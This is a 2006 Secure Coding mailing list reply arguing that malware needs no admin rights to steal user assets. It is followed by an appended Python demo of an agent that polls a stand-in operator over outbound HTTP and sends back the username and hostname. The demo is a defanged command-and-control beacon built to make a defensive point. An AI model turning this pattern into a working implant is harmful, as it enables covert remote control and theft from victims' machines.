Comment inline, ljknews wrote:

> At 11:39 AM +0000 3/25/06, Dinis Cruz wrote:
>> 3) Since my assets as a user exist in user land, isn't the risk profile of malicious unmanaged code (deployed via IE/Firefox) roughly the same if I am running as a 'low privileged' user or as administrator? (at the
>
> If the administrator's assets are compromised, all users of the system will have their assets compromised.

Sure, but if the main assets exist within that user's space, then the risk is similar. Look at your own computer: even if you use a non-admin account (like I am doing at the moment on my PowerBook G4), if a malicious attacker is after your assets (email, VPNs, documents, credit card details, access to your online banking accounts, attacking other computers on your local network, etc.), then he can do all that from user-land (there is no need for admin privileges).

>> end of the day, in both cases the malicious code will still be able to: access my files, access all websites that I have stored credentials in my browser (cookies or username / password pairs), access my VPNs,
>
> Certainly users should not store credentials in software on a computer.

Ok, but this is impossible today (at least in Windows). In a normal user session, you will have credentials (or equivalent) in multiple user-land processes, from login accounts used in your browser to valid Kerberos tickets (or, more to the point, valid Windows security handles (i.e. tokens), which are as good as stored credentials). The bottom line is: if your browser can do it, so can malicious code executed via your browser.

>> attack other computers on the local network, install key loggers,
>
> If one is not the administrator, there should be no way to install software. If there is, the operating system is underprotected.

Who said that? I might not be able to put it under the 'Program Files' folder, add files to the Windows directory or write to some sections of the registry. But since you can run executables, you can perform all sorts of malicious actions. A good example is .Net applications, which can be executed with no installation.

>> establish two-way communication with an Internet-based botnet, etc ...
>
> At least one aspect of that is a design defect in TCP/IP, allowing unprivileged users to create a port to receive inbound connections. Other networking protocols avoid that flaw.

This is not a design flaw in TCP/IP; the problem here is that the OS and the run-time sandbox (if there is one) are allowing this to occur. Remember that if I can talk HTTP with an external computer (located somewhere on the Internet), then I can use it to establish a two-way communication channel. Can you really defend that all applications that are executed on our computers (from WinZip upwards) should be able to connect to the Internet, download code and execute it with the privileges of the logged-in user? Because that is what they can do today (if that computer is connected to the Internet :)

Dinis Cruz
Owasp .Net Project
www.owasp.net
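The exchange discussed above, as an added example that is not part of the original thread: an unprivileged "agent" process establishes a two-way channel with a remote "operator" using nothing but outbound HTTP requests, so the ability to open an inbound listening port (the TCP/IP behaviour ljknews objects to) is never needed. Everything here is constructed for the demo: the operator runs on loopback as a stand-in for the Internet host, the task names and the JSON message format are invented, and the agent only performs a small set of harmless lookups instead of running arbitrary code.

```python
"""Two-way channel over outbound HTTP only (constructed demo).

The agent never calls bind()/listen(); it polls GET /task and answers with
POST /result, which any logged-in user can do on a stock desktop OS.
The operator is a stand-in for the Internet-based host and runs on loopback.
"""
import getpass
import json
import os
import platform
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import Request, urlopen


def _whoami():
    # getpass.getuser() can fail in minimal containers; fall back to the uid.
    try:
        return getpass.getuser()
    except Exception:
        return "uid:%s" % getattr(os, "getuid", lambda: "?")()


# Harmless task set for the demo (assumption); a real implant would accept anything.
TASKS = {
    "whoami": _whoami,
    "hostname": platform.node,
    "cwd": os.getcwd,
}


class Operator:
    """Remote side: hands out tasks on GET /task, collects output on POST /result."""

    def __init__(self, tasks):
        self.queue = list(tasks)      # tasks still to hand out
        self.results = []             # (task, output) pairs received from the agent
        self.lock = threading.Lock()
        self.server = None

    def start(self):
        op = self

        class Handler(BaseHTTPRequestHandler):
            def log_message(self, *args):   # keep the demo quiet
                pass

            def do_GET(self):
                with op.lock:
                    task = op.queue.pop(0) if op.queue else "exit"
                body = json.dumps({"task": task}).encode()
                self.send_response(200)
                self.send_header("Content-Type", "application/json")
                self.send_header("Content-Length", str(len(body)))
                self.end_headers()
                self.wfile.write(body)

            def do_POST(self):
                n = int(self.headers.get("Content-Length", "0"))
                msg = json.loads(self.rfile.read(n))
                with op.lock:
                    op.results.append((msg["task"], msg["output"]))
                self.send_response(204)
                self.end_headers()

        # Port 0: let the OS pick a free loopback port for the stand-in operator.
        self.server = HTTPServer(("127.0.0.1", 0), Handler)
        threading.Thread(target=self.server.serve_forever, daemon=True).start()
        return "http://127.0.0.1:%d" % self.server.server_address[1]

    def stop(self):
        self.server.shutdown()
        self.server.server_close()


def agent(base_url, max_polls=10):
    """Local side: poll for tasks, run them, post the output back. Outbound only."""
    performed = []
    for _ in range(max_polls):
        with urlopen(base_url + "/task", timeout=5) as resp:
            task = json.loads(resp.read())["task"]
        if task == "exit":
            break
        output = TASKS[task]() if task in TASKS else "unknown task"
        data = json.dumps({"task": task, "output": output}).encode()
        req = Request(base_url + "/result", data=data,
                      headers={"Content-Type": "application/json"}, method="POST")
        with urlopen(req, timeout=5) as resp:
            resp.read()
        performed.append(task)
    return performed


def run_exchange(tasks=("whoami", "hostname", "cwd")):
    """Run one full operator/agent session; returns (tasks performed, results received)."""
    op = Operator(tasks)
    url = op.start()
    try:
        performed = agent(url)
    finally:
        op.stop()
    return performed, op.results


if __name__ == "__main__":
    for task, out in run_exchange()[1]:
        print("%-8s -> %s" % (task, out))
```

The agent side is the part that matters for the argument: it makes ordinary outbound HTTP requests of the kind any browser, updater or archiver makes, so a user-land sandbox or egress policy, not the privilege level of the account, is what decides whether such a channel can exist.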
_______________________________________________ Secure Coding mailing list (SC-L) SC-L@securecoding.org List information, subscriptions, etc - http://krvw.com/mailman/listinfo/sc-l List charter available at - http://www.securecoding.org/list/charter.php